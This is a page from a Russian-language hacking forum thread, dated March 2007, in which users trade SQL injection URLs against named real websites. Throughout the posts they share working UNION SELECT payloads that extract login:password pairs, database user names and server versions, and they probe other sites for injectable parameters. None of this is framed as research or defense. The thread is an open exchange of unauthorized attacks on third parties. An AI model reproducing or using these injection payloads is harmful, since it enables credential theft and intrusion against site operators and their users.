ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1271  
Старый 22.03.2007, 17:32
Micr0b
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617

Репутация: 245
Отправить сообщение для Micr0b с помощью ICQ
По умолчанию

Snap >>
http://privet.zp.ua/part4.php3?catid=1'

мож здесь найдьош!)))
 
Ответить с цитированием

  #1272  
Старый 22.03.2007, 17:39
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Цитата:
Сообщение от Micr0b  
Snap >>
http://privet.zp.ua/part4.php3?catid=1'

мож здесь найдьош!)))
думаешь, скрипты разные базы юзают? о_0
ps: automatization.ru
Код:
http://www.automatization.ru/equip-db/device.php?id=-1+union+select+1,2,3,4,5,concat(login,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+user+limit+0,1/*
 
Ответить с цитированием

  #1273  
Старый 22.03.2007, 17:39
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

vechirka.kiev.ua

Код:
http://vechirka.kiev.ua/article.php?id_article=-1+union+select+1,concat(user(),char(58),database(),char(58),version()),3,4+user/*
 
Ответить с цитированием

  #1274  
Старый 22.03.2007, 17:50
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

Код:
http://wc2006.sport.com.ua/teams.phtml?id_team=-6+union+select+concat(password,0x3a,username)+from+users/*
 
Ответить с цитированием

  #1275  
Старый 22.03.2007, 17:51
Snap
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288

Репутация: 82
Отправить сообщение для Snap с помощью ICQ
По умолчанию

База то одна только вот занвание таблиц подобрать не могу
http://privet.zp.ua/anketa.php3?part=1&id=-4708+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23/*

Поэтому толку нет мне кажеться из других мест биться
 
Ответить с цитированием

  #1276  
Старый 22.03.2007, 17:51
Micr0b
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617

Репутация: 245
Отправить сообщение для Micr0b с помощью ICQ
По умолчанию

n1†R0x здесь маса вареантов он титулкы на главной до названия самого файла где призошла ошыбка... я имел виду в том что может быть какаято зацепка..) с всего етого
 
Ответить с цитированием

  #1277  
Старый 22.03.2007, 18:08
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

www.02.ru

Правоохранительный Портал

Код:
http://www.02.ru/news/index.php?id_tn=-1
Код:
http://www.02.ru/news/index.php?id_tn=8&id_n=668-1
Код:
http://www.02.ru/news/index.php?id_tn=8&id_n=667'

Последний раз редактировалось Ksander; 22.03.2007 в 18:23..
 
Ответить с цитированием

  #1278  
Старый 22.03.2007, 18:14
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Ксандер
http://www.02.ru/news/index.php?id_tn=-2+union+select+1,2/*
просто вывода нет =)
 
Ответить с цитированием

  #1279  
Старый 22.03.2007, 18:21
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

Цитата:
Сообщение от Spyder  
Ксандер
http://www.02.ru/news/index.php?id_tn=-2+union+select+1,2/*
просто вывода нет =)

Тоже это заметил, но думал это у меня глюкануло, значит нет=), даже конверт пробовал =))



p.s. в процесе
Код:
http://www.soaw.org/new/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11
 
Ответить с цитированием

  #1280  
Старый 22.03.2007, 18:33
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

[shop]
Код:
http://www.loversandfriends.nl/shop.php?id=-56+union+select+1,2,3,user(),database(),6,7,8,9,version(),11,12,13,14,15,16/*
Код:
http://www.webdesign-freelance.nl/webdesign-freelance-shop.php?id=-15%20UNION%20SELECT%201,convert(user()+using+latin1),3,4,convert(version()+using+latin1)/*

Последний раз редактировалось XTErner; 22.03.2007 в 18:42..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ